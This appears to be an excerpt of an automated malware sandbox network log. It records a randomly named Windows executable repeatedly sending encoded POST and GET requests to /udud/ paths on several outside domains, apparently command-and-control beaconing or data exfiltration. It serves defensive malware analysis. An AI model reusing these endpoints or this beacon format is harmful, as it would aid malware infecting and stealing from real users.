                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtOUGP6c3QKMi6b0OrYgQK4TsrcVKjFPFfVwrFwdnWSVlnlh7gn3aLCH7Rd1pDIl/xuX+KUWEQKx7I2K6u2HJ803GmrKaze9oK7uzkMa156NiQtS7KjPkmqzNqCF8B9ySpc/d0/1W9kAoIyaaIjmDzGplMeWjGDAYIeUFSSOmV95Jf4=
May 27, 2024 12:31:35.543741941 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:35 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.30 | 49833 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:38.065912962 CEST | 1679 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmWgx1aUU1HWpDWeo3rOGX6b9PRhABPtGUauaclGCMsab0HLYlQK4Ssq4RKjJxFctwtn4dhlKVunlhkQn6F7Co7Vx5pDYl/xuX+MYWHBKxoY2Fte2TfM1SGmzaazbIoabuyEcam7SNtQtU4KjpkmmsNqeJ8A5ISvs/OF6eHssH05O3W8nYSCyht8eGkV/XQ7i6LnK71XBMLr9hZUcVPQqAqn72QsgWK+RsvLXLav6nfMfCf5+sZc/ROT6VCCxGeaaQPXXgHAuCAUKsf6eQBEfES0ukhpkKXDLaxerysCUtM+WCQRgt6h7hzcS32gJrDwHD2j5or4ms06gjMs1UgIooI9mIgZiJJKXJRriX6/DXqLg2MurzgH7jqldXIybfs5vzanwPTf7gIpjHnvy0WcGQoQ+4o+zER1DQDBOpEHui7ZY7mhVY8UcFavs7CJll27jiI1qVOhbvnn9ZpaHmiv7sh97tOQPDvA3BS/vJ9qhZHM+tmYw0/i0DvDkEPpwDx0/vMzA17AUstzehgqtMl03mmGPbhqHCHVidhoAqsNGCFo/0aQECnWLnQS3Q5zOQhJhzPn3NteRiuS2LGTa0DjSj3iDlTw/Zx9fSOycX4WnooNvgSEpZLEl49KNldbP4GKGmiFI64q1Q+dHwKtf3/WnRRvJaYSao8kmIqv+C/l0ju322eNUPauoBj/DEcFlh1FkA81pBJzz3T71CXZ8zqHB/Y4Yl0uAKrBKd22vmZiaapqx/jRem/xULkONx5IgHIS3TkyLu0ExnUNH+6n9dh9SzB3I/SYbK5/rm/9Uc86++uhgYJ2pCwimdb1gK7CUNIkDNjooUlr1a2uceMznEJ42tzkCzrk4OwF/G8FZVf/O/2io0WctzD/hDzXoe8nOZoe59yateOEcKDCICCPs4KxzdbhS9684L4GzjEJP8ulzAgd3LubN+o0IRjeQiBjPLnB97H8GrkkXgV9cotNTUYodrdNmIFLngn27 [TRUNCATED]
May 27, 2024 12:31:38.280848980 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:38 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.30 | 49834 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:40.814068079 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:31:41.028924942 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:31:40 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
May 27, 2024 12:31:41.029031992 CEST | 1289 | IN
                                                                                                Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
May 27, 2024 12:31:41.029158115 CEST | 1289 | IN
                                                                                                Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
May 27, 2024 12:31:41.029282093 CEST | 1289 | IN
                                                                                                Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
May 27, 2024 12:31:41.029333115 CEST | 710 | IN
                                                                                                Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.30 | 49835 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:46.436698914 CEST | 766 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2VfdZ5TIHBgIo9GvU1JUGpBHgkH/OVFChI4/KZMU7yzcYUTQc8+G5PWyH0gwo6bMzFLMszEbmsQ0W4kNnjNlXW/mFO+Z2fQku/5PVr20BAui4vA7rwmsa8mODIVQR3nAm4mccsJq+MGF9uks0XoZdBu/NgAb9ij01hPZH+O2BwqfKsauU77GK+iQ==
May 27, 2024 12:31:46.626677990 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:31:46 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.30 | 49836 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:49.147726059 CEST | 786 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2Vd9p5WrvBnopPafU1eEGtBHskH+bQCw1I7eaZNV7ymcYUbwc9zm5QWyD8gyM6bM3FLJozFoOrCUW+/dnhDFXW/mFO+aLwQne/5flr2Q1Hvi4gD7rwtMa4mOD6VUJZnEW4mZwsK7+LPF9srM0ZnJVI3tgURZRH630dHu2kT11y5/2BGv5T5ELl/aer0zjARMswyz8u57CxFgs=
                                                                                                May 27, 2024 12:31:49.337940931 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:31:49 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.11.30 | 49837 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:31:51.865546942 CEST | 1703 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:31:52.055702925 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:31:51 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.11.30 | 49838 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:31:54.583591938 CEST | 486 | OUT | GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:31:54.805875063 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:31:54 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==
                                                                                                last-modified: Mon, 27 May 2024 10:31:54 GMT
                                                                                                x-cache-miss-from: parking-54698f55d6-fzb5c
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.11.30 | 49839 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:01.308526039 CEST | 763 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnyPC8lPs5Rv2FAXdP8jLB0RF/HnD6/kwvVmgowUONAW3OpM5itG6TntU5R6hpwgipmBJSzLQv4E2krdRm7QAN0HjDNcisgc25HjwWrS/eSMlUumhxO7kw9i8NiW8LiVF3USVA2aHqnf4IcfBDc/4yq2V7rk7rYMUubZkM2Zh8AzwuA+B1ovusRw==
                                                                                                May 27, 2024 12:32:02.942785025 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=716og1qojo3bifpm2m5772tjev; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                10 | 192.168.11.30 | 49840 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:04.016633987 CEST | 783 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnxuS8no45UP33M3dPzDLF0RZ/HmHq/SIvUHQozR6NDW3Oxc4ojm6MntYxR/ZpwkypmDhSz8sw5U2mztRkkgAN0HjDNdTHgce5GXMW5j/dTMlX+2hxFbl59i9qiS0tiXt3UX5A2OTlsf4ODvATa/I/sSZnrXjSf/UHXuVWraV+TTMDc/sdqtv3M98oVLpd2IxL2/+AiOHtFks=
                                                                                                May 27, 2024 12:32:08.075407028 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=7i622l48r6s2ese9kc0f0s342d; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                11 | 192.168.11.30 | 49841 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:06.734349966 CEST | 1700 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:07.986896038 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=9usfs89hqp99jbkv3l42n50su4; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                12 | 192.168.11.30 | 49842 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:09.450150967 CEST | 485 | OUT | GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:09.701061010 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=ivb4pecgn5jglcq8ucmv9i37gr; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                May 27, 2024 12:32:09.701579094 CEST1289INData Raw: 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d 67 69 6f 72 6e 6f 2d 64 65 6c 2d 6d 61 74 72 69 6d 6f 6e 69 6f 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                                Data Ascii: </li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><span class="menu-item-text">Conferma pa
                                                                                                May 27, 2024 12:32:09.701780081 CEST1289INData Raw: 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e
                                                                                                Data Ascii: e controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf"> <div class="sw cf"><div class="sw-c cf"><
                                                                                                May 27, 2024 12:32:09.701811075 CEST1289INData Raw: 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0d 0a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang lang-select cf"></div>
                                                                                                May 27, 2024 12:32:09.701889038 CEST1289INData Raw: 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20 36 2e 31 32 37 20 36 2e 37 30 37 7a 6d 2d 31 2e 38 34 38 20 30 63 30 2d 33 2e 34 38 2d 31 2e 32 37 2d 35 2e 30 30 34 2d 34 2e 32 34 32 2d 35 2e 30 30 34 2d 32 2e 39
                                                                                                Data Ascii: .65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5.91 0-5.693 5.51-5.693 6.888 0 5.402 3.226 6.526 5.945
                                                                                                May 27, 2024 12:32:09.885179996 CEST1289INData Raw: 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36 33 20 30 20 35 2e 39 38 32 20 33 2e 35 39 20 36 2e 38 39 20 35 2e 37 32 38 20 36 2e 38 39 20 34 2e 39 33 20 30 20 35 2e 32 39 34 2d 33 2e 31 35 35 20 35 2e 32 39 34
                                                                                                Data Ascii: .72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><section class="cb cb-dark" id="cookiebar" style="display:none;"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                13 | 192.168.11.30 | 49843 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:32:23.763503075 CEST | 742 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
